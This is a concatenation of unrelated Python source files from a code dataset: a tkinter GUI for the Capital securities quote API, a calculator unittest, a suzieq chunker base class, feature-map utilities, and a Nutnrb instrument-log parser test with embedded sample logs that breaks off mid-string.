# Instantiate the Capital (群益) API COM components once at import time:
# center (login/config), OO and OS quote feeds, order channel, domestic
# quote feed, and the reply channel.
skC = comtypes.client.CreateObject(sk.SKCenterLib,interface=sk.ISKCenterLib)
skOOQ = comtypes.client.CreateObject(sk.SKOOQuoteLib,interface=sk.ISKOOQuoteLib)
skO = comtypes.client.CreateObject(sk.SKOrderLib,interface=sk.ISKOrderLib)
skOSQ = comtypes.client.CreateObject(sk.SKOSQuoteLib,interface=sk.ISKOSQuoteLib)
skQ = comtypes.client.CreateObject(sk.SKQuoteLib,interface=sk.ISKQuoteLib)
skR = comtypes.client.CreateObject(sk.SKReplyLib,interface=sk.ISKReplyLib)
# 畫視窗用物件
from tkinter import *
from tkinter.ttk import *
from tkinter import messagebox,colorchooser,font,Button,Frame,Label
# 數學計算用物件
import math
# 顯示各功能狀態用的function
def WriteMessage(strMsg, listInformation):
    """Append strMsg as the last entry of the given listbox and scroll it
    into view."""
    listInformation.insert('end', strMsg)
    listInformation.see('end')
def SendReturnMessage(strType, nCode, strMessage, listInformation):
    """Forward a Capital API return code to GetMessage for display."""
    GetMessage(strType, nCode, strMessage, listInformation)
def GetMessage(strType, nCode, strMessage, listInformation):
    """Format a Capital API return message (with the last log info when the
    call failed) and append it to the listbox."""
    extra = "" if nCode == 0 else "【{0}】".format(skC.SKCenterLib_GetLastLogInfo())
    text = "【{0}】【{1}】【{2}】{3}".format(
        strType, strMessage, skC.SKCenterLib_GetReturnCodeMessage(nCode), extra)
    WriteMessage(text, listInformation)
#----------------------------------------------------------------------------------------------------------------------------------------------------
#上半部登入框
class FrameLogin(Frame):
    """Top frame of the window: account/password entries, a login button,
    and the shared status listbox."""
    def __init__(self, master = None):
        Frame.__init__(self, master)
        self.grid()
        #self.pack()
        self.place()
        self.FrameLogin = Frame(self)
        self.master["background"] = "#ffecec"
        self.FrameLogin.master["background"] = "#ffecec"
        self.createWidgets()
    def createWidgets(self):
        """Build the login widgets and register the shared message list and
        ID label as module globals."""
        # account label
        self.labelID = Label(self)
        self.labelID["text"] = "帳號:"
        self.labelID["background"] = "#ffecec"
        self.labelID["font"] = 20
        self.labelID.grid(column=0,row=0)
        # account entry field
        self.textID = Entry(self)
        self.textID["width"] = 50
        self.textID.grid(column = 1, row = 0)
        # password label
        self.labelPassword = Label(self)
        self.labelPassword["text"] = "密碼:"
        self.labelPassword["background"] = "#ffecec"
        self.labelPassword["font"] = 20
        self.labelPassword.grid(column = 2, row = 0)
        # password entry field (masked)
        self.textPassword = Entry(self)
        self.textPassword["width"] = 50
        self.textPassword['show'] = '*'
        self.textPassword.grid(column = 3, row = 0)
        # login button
        self.buttonLogin = Button(self)
        self.buttonLogin["text"] = "登入"
        self.buttonLogin["background"] = "#ff9797"
        self.buttonLogin["foreground"] = "#000000"
        self.buttonLogin["highlightbackground"] = "#ff0000"
        self.buttonLogin["font"] = 20
        self.buttonLogin["command"] = self.buttonLogin_Click
        self.buttonLogin.grid(column = 4, row = 0)
        # logged-in ID display
        # NOTE(review): self.labelID is reassigned here, clobbering the
        # reference to the account label created above.
        self.labelID = Label(self)
        self.labelID["text"] = "<<ID>>"
        self.labelID["background"] = "#ffecec"
        self.labelID["font"] = 20
        self.labelID.grid(column = 5, row = 0)
        # message list (attached to the global root window)
        self.listInformation = Listbox(root, height=5)
        self.listInformation.grid(column = 0, row = 1, sticky = E + W)
        global GlobalListInformation,Global_ID
        GlobalListInformation = self.listInformation
        Global_ID = self.labelID
    # Login button handler: every Capital API feature requires a successful
    # login first.
    def buttonLogin_Click(self):
        """Log in through SKCenterLib and show the result in the listbox."""
        try:
            skC.SKCenterLib_SetLogPath(os.path.split(os.path.realpath(__file__))[0] + "\\CapitalLog_Quote")
            m_nCode = skC.SKCenterLib_Login(self.textID.get().replace(' ',''),self.textPassword.get().replace(' ',''))
            if(m_nCode==0):
                Global_ID["text"] = self.textID.get().replace(' ','')
                WriteMessage("登入成功",self.listInformation)
            else:
                WriteMessage(m_nCode,self.listInformation)
        except Exception as e:
            messagebox.showerror("error!",e)
# 報價連線的按鈕
class FrameQuote(Frame):
    """Quote tab: connect/disconnect buttons plus the Quote and KLine
    sub-tabs."""
    def __init__(self, master = None):
        Frame.__init__(self, master)
        self.grid()
        self.FrameQuote = Frame(self)
        self.FrameQuote.master["background"] = "#ffecec"
        self.createWidgets()
    def createWidgets(self):
        """Build the connect/disconnect buttons and the inner tab control."""
        #ID
        # self.labelID = Label(self)
        # self.labelID["text"] = "ID:"
        # self.labelID.grid(column = 0, row = 0)
        # quote-connect button
        self.btnConnect = Button(self)
        self.btnConnect["text"] = "報價連線"
        self.btnConnect["background"] = "#ff9797"
        self.btnConnect["font"] = 20
        self.btnConnect["command"] = self.btnConnect_Click
        self.btnConnect.grid(column = 0, row = 1)
        # quote-disconnect button
        self.btnDisconnect = Button(self)
        self.btnDisconnect["text"] = "報價斷線"
        self.btnDisconnect["background"] = "#ff9797"
        self.btnDisconnect["font"] = 20
        self.btnDisconnect["command"] = self.btnDisconnect_Click
        self.btnDisconnect.grid(column = 1, row = 1)
        # #ConnectSignal
        # self.ConnectSignal = Label(self)
        # self.ConnectSignal["text"] = "【FALSE】"
        # self.ConnectSignal.grid(column = 2, row = 1)
        # inner tab control with the quote-detail and K-line pages
        self.TabControl = Notebook(self)
        self.TabControl.add(Quote(master = self),text="報價細節")
        self.TabControl.add(KLine(master = self),text="KLine")
        self.TabControl.grid(column = 0, row = 2, sticky = E + W, columnspan = 4)
    def btnConnect_Click(self):
        """Open the quote-feed connection."""
        try:
            m_nCode = skQ.SKQuoteLib_EnterMonitor()
            SendReturnMessage("Quote", m_nCode, "SKQuoteLib_EnterMonitor",GlobalListInformation)
        except Exception as e:
            messagebox.showerror("error!",e)
    def btnDisconnect_Click(self):
        """Close the quote-feed connection and report the result."""
        try:
            m_nCode = skQ.SKQuoteLib_LeaveMonitor()
            if (m_nCode != 0):
                strMsg = "SKQuoteLib_LeaveMonitor failed!", skC.SKCenterLib_GetReturnCodeMessage(m_nCode)
                WriteMessage(strMsg,GlobalListInformation)
            else:
                SendReturnMessage("Quote", m_nCode, "SKQuoteLib_LeaveMonitor",GlobalListInformation)
        except Exception as e:
            messagebox.showerror("error!",e)
#下半部-報價-Quote項目
class Quote(Frame):
    """Quote-detail page: request live quotes for a page number and a list
    of product codes."""
    def __init__(self, master = None):
        Frame.__init__(self, master)
        self.grid()
        self.Quote = Frame(self)
        self.Quote.master["background"] = "#ffecec"
        self.createWidgets()
    def createWidgets(self):
        """Build the page-number / product-code inputs, the query button and
        the output listbox (also registered as a module global)."""
        # page-number label
        self.LabelPageNo = Label(self)
        self.LabelPageNo["text"] = "PageNo"
        self.LabelPageNo["background"] = "#ffecec"
        self.LabelPageNo["font"] = 20
        self.LabelPageNo.grid(column=0,row=0)
        # page-number entry field
        self.txtPageNo = Entry(self)
        self.txtPageNo.grid(column=1,row=0)
        # product-code label
        self.LabelStocks = Label(self)
        self.LabelStocks["text"] = "商品代碼"
        self.LabelStocks["background"] = "#ffecec"
        self.LabelStocks["font"] = 20
        self.LabelStocks.grid(column=2,row=0)
        # product-code entry field
        self.txtStocks = Entry(self)
        self.txtStocks.grid(column=3,row=0)
        # hint: multiple codes are comma-separated
        self.LabelP = Label(self)
        self.LabelP["text"] = "( 多筆以逗號{,}區隔 )"
        self.LabelP["background"] = "#ffecec"
        self.LabelP["font"] = 20
        self.LabelP.grid(column=2,row=1, columnspan=2)
        # query button
        self.btnQueryStocks = Button(self)
        self.btnQueryStocks["text"] = "查詢"
        self.btnQueryStocks["background"] = "#ff9797"
        self.btnQueryStocks["foreground"] = "#000000"
        self.btnQueryStocks["font"] = 20
        self.btnQueryStocks["command"] = self.btnQueryStocks_Click
        self.btnQueryStocks.grid(column = 4, row = 0)
        # message list
        self.listInformation = Listbox(self, height = 25, width = 100)
        self.listInformation.grid(column = 0, row = 2, sticky = E + W, columnspan = 6)
        global Gobal_Quote_ListInformation
        Gobal_Quote_ListInformation = self.listInformation
    def btnQueryStocks_Click(self):
        """Request quotes for the entered codes (page defaults to 0)."""
        try:
            if(self.txtPageNo.get().replace(' ','') == ''):
                pn = 0
            else:
                pn = int(self.txtPageNo.get())
            skQ.SKQuoteLib_RequestStocks(pn,self.txtStocks.get().replace(' ',''))
        except Exception as e:
            messagebox.showerror("error!",e)
#下半部-報價-KLine項目
class KLine(Frame):
    """K-line (candlestick) page: request historical K-line data for one
    product code."""
    def __init__(self, master = None):
        Frame.__init__(self, master)
        self.grid()
        self.KLine = Frame(self)
        self.KLine.master["background"] = "#ffecec"
        self.createWidgets()
    def createWidgets(self):
        """Build the code entry, K-line type/format comboboxes, query button
        and the output listbox (also registered as a module global)."""
        # product-code label
        self.LabelKLine = Label(self)
        self.LabelKLine["text"] = "商品代碼"
        self.LabelKLine["background"] = "#ffecec"
        self.LabelKLine["font"] = 20
        self.LabelKLine.grid(column=0,row=0)
        # product-code entry field
        self.txtKLine = Entry(self)
        self.txtKLine.grid(column=1,row=0)
        # hint (disabled)
        # self.LabelP = Label(self)
        # self.LabelP["text"] = "( 多筆以逗號{,}區隔 )"
        # self.LabelP.grid(column=0,row=1, columnspan=2)
        # K-line type: 1-minute / full-day / weekly / monthly
        self.boxKLine = Combobox(self,state='readonly')
        self.boxKLine['values'] = ("0 = 1分鐘線", "4 =完整日線", "5 =週線", "6 =月線")
        self.boxKLine.grid(column=2,row=0)
        # K-line output format: legacy / new
        self.boxOutType = Combobox(self,state='readonly')
        self.boxOutType['values'] = ("0=舊版輸出格式", "1=新版輸出格式")
        self.boxOutType.grid(column=3,row=0)
        # query button
        self.btnKLine = Button(self)
        self.btnKLine["text"] = "查詢"
        self.btnKLine["background"] = "#ff9797"
        self.btnKLine["foreground"] = "#000000"
        self.btnKLine["font"] = 20
        self.btnKLine["command"] = self.btnKLine_Click
        self.btnKLine.grid(column = 4, row = 0)
        # "calculate" button (disabled)
        # self.btnCalcute = Button(self)
        # self.btnCalcute["text"] = "計算"
        # self.btnCalcute["background"] = "#66b3ff"
        # self.btnCalcute["foreground"] = "white"
        # self.btnCalcute["font"] = 20
        # self.btnCalcute["command"] = self.btnCalcute_Click
        # self.btnCalcute.grid(column = 5, row = 0)
        # message list
        self.listInformation = Listbox(self, height = 25, width = 100)
        self.listInformation.grid(column = 0, row = 2, sticky = E + W, columnspan = 6)
        # NOTE: even though the global was assigned elsewhere, it must be
        # declared global here again or the assignment stays local.
        global Gobal_KLine_ListInformation
        Gobal_KLine_ListInformation = self.listInformation
    def btnKLine_Click(self):
        """Map the combobox selections to the numeric API arguments and
        request the K-line data."""
        try:
            # skQ.SKQuoteLib_RequestKLine(self.txtKLine.get(),self.boxKLine.get(),self.boxOutType.get())
            if(self.boxKLine.get() == "0 = 1分鐘線"):
                ktp=0
            elif(self.boxKLine.get() == "4 =完整日線"):
                ktp=4
            elif(self.boxKLine.get() == "5 =週線"):
                ktp=5
            else:
                ktp=6
            if(self.boxOutType.get() == "0=舊版輸出格式"):
                otp=0
            else:
                otp=1
            m_nCode = skQ.SKQuoteLib_RequestKLine(self.txtKLine.get().replace(' ','') , ktp , otp)
            SendReturnMessage("Quote", m_nCode, "SKQuoteLib_RequestKLine",GlobalListInformation)
        except Exception as e:
            messagebox.showerror("error!",e)
#事件
class SKQuoteLibEvents:
    """Event sink receiving SKQuoteLib COM callbacks and echoing them to
    the UI listboxes."""
    def OnConnection(self, nKind, nCode):
        """Connection-state callback."""
        if (nKind == 3001):
            strMsg = "Connected!"
        elif (nKind == 3002):
            strMsg = "DisConnected!"
        elif (nKind == 3003):
            strMsg = "Stocks ready!"
        elif (nKind == 3021):
            strMsg = "Connect Error!"
        else:
            # Bug fix: unknown nKind values previously left strMsg unbound
            # and raised NameError; report them instead.
            strMsg = "Unknown connection event: nKind={0}, nCode={1}".format(nKind, nCode)
        WriteMessage(strMsg,GlobalListInformation)
    def OnNotifyQuote(self, sMarketNo, sStockidx):
        """Quote update: fetch the stock snapshot and show the key fields."""
        pStock = sk.SKSTOCK()
        skQ.SKQuoteLib_GetStockByIndex(sMarketNo, sStockidx, pStock)
        # Prices arrive as scaled integers; divide by 10**sDecimal to recover them.
        strMsg = '代碼:',pStock.bstrStockNo,'--名稱:',pStock.bstrStockName,'--開盤價:',pStock.nOpen/math.pow(10,pStock.sDecimal),'--最高:',pStock.nHigh/math.pow(10,pStock.sDecimal),'--最低:',pStock.nLow/math.pow(10,pStock.sDecimal),'--成交價:',pStock.nClose/math.pow(10,pStock.sDecimal),'--總量:',pStock.nTQty
        WriteMessage(strMsg,Gobal_Quote_ListInformation)
    def OnNotifyKLineData(self,bstrStockNo,bstrData):
        """K-line data callback: show the raw CSV line for the stock.
        (Removed the unused cutData = bstrData.split(',') local.)"""
        strMsg = bstrStockNo,bstrData
        WriteMessage(strMsg,Gobal_KLine_ListInformation)
#SKQuoteLibEventHandler = win32com.client.WithEvents(SKQuoteLib, SKQuoteLibEvents)
# Wire the event sink to the quote COM object; the handler object must stay
# referenced for the lifetime of the program.
SKQuoteEvent=SKQuoteLibEvents()
SKQuoteLibEventHandler = comtypes.client.GetEvents(skQ, SKQuoteEvent)
if __name__ == '__main__':
    # Build the main window: login frame on top, quote tab below.
    root = Tk()
    FrameLogin(master = root)
    #TabControl
    root.TabControl = Notebook(root)
    root.TabControl.add(FrameQuote(master = root),text="報價功能")
    root.TabControl.grid(column = 0, row = 2, sticky = E + W)
    root.mainloop()
| StarcoderdataPython |
3264336 | <gh_stars>0
import unittest
import Calculadora_Melu
class TestCalculadora (unittest.TestCase):
    """Unit tests for the Calculadora_Melu module."""
    def testMultiplicacion(self):
        # 2 * 4 should give 8.
        resultado=Calculadora_Melu.multiplicacion (2, 4)
        self.assertEqual(resultado, 8)
if __name__ == "__main__":
    unittest.main()
| StarcoderdataPython |
1797724 | """This module contains the base class for a Chunker.
Classes:
Chunker: The duty of a chunker is to get the global inventory and split it
in smaller chunks
"""
from abc import abstractmethod
from suzieq.poller.controller.base_controller_plugin import ControllerPlugin
class Chunker(ControllerPlugin):
    """Abstract base class for inventory chunkers.

    A chunker receives the global device inventory and splits it into
    smaller chunks that can be handed to independent workers.
    """
    @abstractmethod
    def chunk(self, glob_inv, n_chunks, **addl_params):
        """Split the global inventory in <n_chunks> chunks.

        Args:
            glob_inv: global inventory to split
            n_chunks: number of chunks to produce
            **addl_params: custom keyword parameters that each Chunker
                plugin can define
        """
| StarcoderdataPython |
116756 | <reponame>wilkeraziz/chisel<gh_stars>1-10
__author__ = 'waziz'
from itertools import izip
import numpy as np
def scaled_fmap(fmap, scaling=1.0):
    """Return a feature map with every value multiplied by `scaling`.

    Accepts either a dict or an iterable of (name, value) pairs; always
    returns a dict.
    """
    pairs = fmap.iteritems() if type(fmap) is dict else fmap
    return {name: value * scaling for name, value in pairs}
def fmap_dot(fmap, wmap):
    """Dot product between a sparse feature map and a weight map; features
    absent from `fmap` contribute zero."""
    return np.sum([wvalue * fmap.get(wname, 0)
                   for wname, wvalue in wmap.iteritems()])
def str2fmap(line):
    """Parse a string of the form 'f1=v1 f2=v2' into {f1: v1, f2: v2}
    with float values."""
    fmap = {}
    for pair in line.split():
        name, value = pair.split('=')
        fmap[name] = float(value)
    return fmap
def fpairs2str(iterable):
    """Render an iterable of (feature, value) pairs as a single
    space-separated 'name=value' string."""
    return ' '.join('{0}={1}'.format(fname, fvalue)
                    for fname, fvalue in iterable)
def dict2str(d, separator='=', sort=False, reverse=False):
    """Render a dict as space-separated 'key<separator>value' tokens,
    optionally sorted by key (descending when `reverse` is set)."""
    items = d.iteritems()
    if sort:
        items = sorted(items, reverse=reverse)
    return ' '.join('{0}{1}{2}'.format(k, separator, v) for k, v in items)
def npvec2str(nparray, fnames=None):
    """Render a vector of feature values as a string; each value is paired
    with its name when `fnames` is given."""
    if fnames is None:
        return ' '.join(str(fvalue) for fvalue in nparray)
    return ' '.join('{0}={1}'.format(fname, fvalue)
                    for fname, fvalue in zip(fnames, nparray))
def kv2str(key, value, named=True):
    """Render a key/value pair as 'key=value', or just the value when
    `named` is false."""
    if named:
        return '{0}={1}'.format(key, value)
    return str(value)
def resample(p, size):
    """Draw `size` samples from the categorical distribution `p` and return
    the resulting empirical distribution over the same support."""
    support = p.size
    draws = np.random.choice(np.arange(support), size, p=p)
    hist, _edges = np.histogram(draws, bins=np.arange(support + 1), density=True)
    return hist
def obj2id(element, vocab):
    """Return the integer id of `element` in `vocab`, assigning the next
    free id (and mutating `vocab`) when the element is new."""
    if element in vocab:
        return vocab[element]
    new_id = len(vocab)
    vocab[element] = new_id
    return new_id
| StarcoderdataPython |
30909 | #!/usr/bin/env python
"""
@package mi.dataset.parser.test.test_nutnrb
@file marine-integrations/mi/dataset/parser/test/test_nutnrb.py
@author <NAME>
@brief Test code for a Nutnrb data parser
"""
import unittest
import gevent
from StringIO import StringIO
from nose.plugins.attrib import attr
from mi.core.log import get_logger ; log = get_logger()
from mi.core.exceptions import SampleException
from mi.dataset.test.test_parser import ParserUnitTestCase
from mi.dataset.dataset_driver import DataSetDriverConfigKeys
from mi.dataset.parser.nutnrb import NutnrbParser, NutnrbDataParticle, StateKey
# Add a mixin here if needed
@unittest.skip('Nutnr parser is broken, timestamp needs to be fixed')
@attr('UNIT', group='mi')
class NutnrbParserUnitTestCase(ParserUnitTestCase):
    """
    Nutnrb parser unit test suite.

    Feeds captured instrument log text to NutnrbParser and verifies the
    particles produced, the parser's position state, and the values
    delivered through the state and publish callbacks.
    """
    # Captured instrument log: status chatter plus four SATN* science
    # records.  NOTE(review): the expected POSITION values asserted in the
    # tests below are tied to the exact bytes of these strings -- do not
    # reformat them.
    TEST_DATA = """
2012/12/13 15:29:20.362 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:30:06.455 [nutnr:DLOGP1]:S
2012/12/13 15:30:06.676 [nutnr:DLOGP1]:O
2012/12/13 15:30:06.905 [nutnr:DLOGP1]:S
2012/12/13 15:30:07.130 [nutnr:DLOGP1]:Y
2012/12/13 15:30:07.355 [nutnr:DLOGP1]:1
2012/12/13 15:30:07.590 [nutnr:DLOGP1]:T
2012/12/13 15:30:07.829 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.052 [nutnr:DLOGP1]:3
2012/12/13 15:30:08.283 [nutnr:DLOGP1]:L
2012/12/13 15:30:08.524 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.743 [nutnr:DLOGP1]:1
2012/12/13 15:30:08.969 [nutnr:DLOGP1]:D
2012/12/13 15:30:09.194 [nutnr:DLOGP1]:Y
2012/12/13 15:30:09.413 [nutnr:DLOGP1]:0
2012/12/13 15:30:09.623 [nutnr:DLOGP1]:Q
2012/12/13 15:30:09.844 [nutnr:DLOGP1]:D
2012/12/13 15:30:10.096 [nutnr:DLOGP1]:O
2012/12/13 15:30:10.349 [nutnr:DLOGP1]:Y
2012/12/13 15:30:10.570 [nutnr:DLOGP1]:5
2012/12/13 15:30:10.779 [nutnr:DLOGP1]:Q
2012/12/13 15:30:10.990 [nutnr:DLOGP1]:Q
2012/12/13 15:30:11.223 [nutnr:DLOGP1]:Y
2012/12/13 15:30:11.703 [nutnr:DLOGP1]:Y
2012/12/13 15:30:12.841 [nutnr:DLOGP1]:2012/12/13 15:30:11
2012/12/13 15:30:13.261 [nutnr:DLOGP1]:Instrument started with initialize
2012/12/13 15:30:19.270 [nutnr:DLOGP1]:onds.
2012/12/13 15:30:20.271 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:30:21.272 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:30:22.272 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:30:23.273 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:30:24.273 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:30:25.274 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:30:26.275 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:30:27.275 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:30:28.309 [nutnr:DLOGP1]:12/13/2012 15:30:26: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:30:59.889 [nutnr:DLOGP1]: ++++++++++ charged
2012/12/13 15:31:00.584 [nutnr:DLOGP1]: ON Spectrometer.
2012/12/13 15:31:01.366 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Spectrometer powered up.
2012/12/13 15:31:01.435 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Turning ON UV light source.
2012/12/13 15:31:06.917 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: UV light source powered up.
2012/12/13 15:31:07.053 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: Data log file is 'DATA\SCH12348.DAT'.
2012/12/13 15:31:08.726 SATNDC0239,2012348,15.518322,0.00,0.00,0.00,0.00,0.000000
2012/12/13 15:31:10.065 SATNLC0239,2012348,15.518666,-5.48,20.38,-31.12,0.59,0.000231
2012/12/13 15:31:11.405 SATNLC0239,2012348,15.519024,-6.38,24.24,-37.41,0.61,0.000191
2012/12/13 15:31:12.720 SATNLC0239,2012348,15.519397,-6.77,24.80,-38.00,0.62,0.000203
2012/12/13 15:42:25.429 [nutnr:DLOGP1]:ISUS will start in 15 seconds.
2012/12/13 15:42:26.430 [nutnr:DLOGP1]:ISUS will start in 14 seconds.
2012/12/13 15:42:27.431 [nutnr:DLOGP1]:ISUS will start in 13 seconds.
2012/12/13 15:42:28.431 [nutnr:DLOGP1]:ISUS will start in 12 seconds.
2012/12/13 15:42:29.432 [nutnr:DLOGP1]:ISUS will start in 11 seconds.
2012/12/13 15:42:30.433 [nutnr:DLOGP1]:ISUS will start in 10 seconds.
2012/12/13 15:42:31.434 [nutnr:DLOGP1]:ISUS will start in 9 seconds.
2012/12/13 15:42:32.435 [nutnr:DLOGP1]:ISUS will start in 8 seconds.
2012/12/13 15:42:33.436 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:42:34.436 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:42:35.437 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:42:36.438 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:42:37.438 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:42:38.439 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:42:39.440 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:42:40.440 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:42:41.474 [nutnr:DLOGP1]:12/13/2012 15:42:38: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:45:26.795 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:45:46.793 [nutnr:DLOGP1]:Instrument started
2012/12/13 17:51:53.412 [nutnr:DLOGP1]:S
2012/12/13 17:51:53.633 [nutnr:DLOGP1]:O
2012/12/13 17:51:53.862 [nutnr:DLOGP1]:S
2012/12/13 17:51:54.088 [nutnr:DLOGP1]:Y
2012/12/13 17:51:54.312 [nutnr:DLOGP1]:1
2012/12/13 17:51:54.548 [nutnr:DLOGP1]:T
2012/12/13 17:51:54.788 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.011 [nutnr:DLOGP1]:3
2012/12/13 17:51:55.243 [nutnr:DLOGP1]:L
2012/12/13 17:51:55.483 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.702 [nutnr:DLOGP1]:1
2012/12/13 17:51:55.928 [nutnr:DLOGP1]:D
2012/12/13 17:51:56.154 [nutnr:DLOGP1]:Y
2012/12/13 17:51:56.373 [nutnr:DLOGP1]:0
2012/12/13 17:51:56.582 [nutnr:DLOGP1]:Q
2012/12/13 17:51:56.803 [nutnr:DLOGP1]:D
2012/12/13 17:51:57.055 [nutnr:DLOGP1]:O
2012/12/13 17:51:57.308 [nutnr:DLOGP1]:Y
2012/12/13 17:51:57.529 [nutnr:DLOGP1]:5
2012/12/13 17:51:57.738 [nutnr:DLOGP1]:Q
2012/12/13 17:51:57.948 [nutnr:DLOGP1]:Q
2012/12/13 17:51:58.181 [nutnr:DLOGP1]:Y
2012/12/13 17:51:58.659 [nutnr:DLOGP1]:Y
2012/12/13 17:51:59.747 [nutnr:DLOGP1]:2012/12/13 17:51:58
2012/12/13 17:52:00.166 [nutnr:DLOGP1]:Instrument started with initialize
"""
    # Same capture as TEST_DATA but with eleven SATN* science records
    # (one SATNDC plus ten SATNLC); used by test_long_stream.
    LONG_DATA = """
2012/12/13 15:29:20.362 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:30:06.455 [nutnr:DLOGP1]:S
2012/12/13 15:30:06.676 [nutnr:DLOGP1]:O
2012/12/13 15:30:06.905 [nutnr:DLOGP1]:S
2012/12/13 15:30:07.130 [nutnr:DLOGP1]:Y
2012/12/13 15:30:07.355 [nutnr:DLOGP1]:1
2012/12/13 15:30:07.590 [nutnr:DLOGP1]:T
2012/12/13 15:30:07.829 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.052 [nutnr:DLOGP1]:3
2012/12/13 15:30:08.283 [nutnr:DLOGP1]:L
2012/12/13 15:30:08.524 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.743 [nutnr:DLOGP1]:1
2012/12/13 15:30:08.969 [nutnr:DLOGP1]:D
2012/12/13 15:30:09.194 [nutnr:DLOGP1]:Y
2012/12/13 15:30:09.413 [nutnr:DLOGP1]:0
2012/12/13 15:30:09.623 [nutnr:DLOGP1]:Q
2012/12/13 15:30:09.844 [nutnr:DLOGP1]:D
2012/12/13 15:30:10.096 [nutnr:DLOGP1]:O
2012/12/13 15:30:10.349 [nutnr:DLOGP1]:Y
2012/12/13 15:30:10.570 [nutnr:DLOGP1]:5
2012/12/13 15:30:10.779 [nutnr:DLOGP1]:Q
2012/12/13 15:30:10.990 [nutnr:DLOGP1]:Q
2012/12/13 15:30:11.223 [nutnr:DLOGP1]:Y
2012/12/13 15:30:11.703 [nutnr:DLOGP1]:Y
2012/12/13 15:30:12.841 [nutnr:DLOGP1]:2012/12/13 15:30:11
2012/12/13 15:30:13.261 [nutnr:DLOGP1]:Instrument started with initialize
2012/12/13 15:30:19.270 [nutnr:DLOGP1]:onds.
2012/12/13 15:30:20.271 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:30:21.272 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:30:22.272 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:30:23.273 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:30:24.273 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:30:25.274 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:30:26.275 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:30:27.275 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:30:28.309 [nutnr:DLOGP1]:12/13/2012 15:30:26: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:30:59.889 [nutnr:DLOGP1]: ++++++++++ charged
2012/12/13 15:31:00.584 [nutnr:DLOGP1]: ON Spectrometer.
2012/12/13 15:31:01.366 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Spectrometer powered up.
2012/12/13 15:31:01.435 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Turning ON UV light source.
2012/12/13 15:31:06.917 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: UV light source powered up.
2012/12/13 15:31:07.053 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: Data log file is 'DATA\SCH12348.DAT'.
2012/12/13 15:31:08.726 SATNDC0239,2012348,15.518322,0.00,0.00,0.00,0.00,0.000000
2012/12/13 15:31:10.065 SATNLC0239,2012348,15.518666,-5.48,20.38,-31.12,0.59,0.000231
2012/12/13 15:31:11.405 SATNLC0239,2012348,15.519024,-6.38,24.24,-37.41,0.61,0.000191
2012/12/13 15:31:12.720 SATNLC0239,2012348,15.519397,-6.77,24.80,-38.00,0.62,0.000203
2012/12/13 15:31:14.041 SATNLC0239,2012348,15.519770,-5.28,18.39,-27.76,0.59,0.000212
2012/12/13 15:31:15.350 SATNLC0239,2012348,15.520128,-7.57,32.65,-51.28,0.62,0.000186
2012/12/13 15:31:16.695 SATNLC0239,2012348,15.520501,-6.17,24.43,-37.71,0.60,0.000218
2012/12/13 15:31:18.015 SATNLC0239,2012348,15.520875,-5.59,18.68,-28.01,0.60,0.000166
2012/12/13 15:31:19.342 SATNLC0239,2012348,15.521232,-7.30,30.87,-48.21,0.62,0.000235
2012/12/13 15:31:20.704 SATNLC0239,2012348,15.521605,-7.52,31.35,-49.03,0.63,0.000240
2012/12/13 15:42:25.429 [nutnr:DLOGP1]:ISUS will start in 15 seconds.
2012/12/13 15:42:26.430 [nutnr:DLOGP1]:ISUS will start in 14 seconds.
2012/12/13 15:42:27.431 [nutnr:DLOGP1]:ISUS will start in 13 seconds.
2012/12/13 15:42:28.431 [nutnr:DLOGP1]:ISUS will start in 12 seconds.
2012/12/13 15:42:29.432 [nutnr:DLOGP1]:ISUS will start in 11 seconds.
2012/12/13 15:42:30.433 [nutnr:DLOGP1]:ISUS will start in 10 seconds.
2012/12/13 15:42:31.434 [nutnr:DLOGP1]:ISUS will start in 9 seconds.
2012/12/13 15:42:32.435 [nutnr:DLOGP1]:ISUS will start in 8 seconds.
2012/12/13 15:42:33.436 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
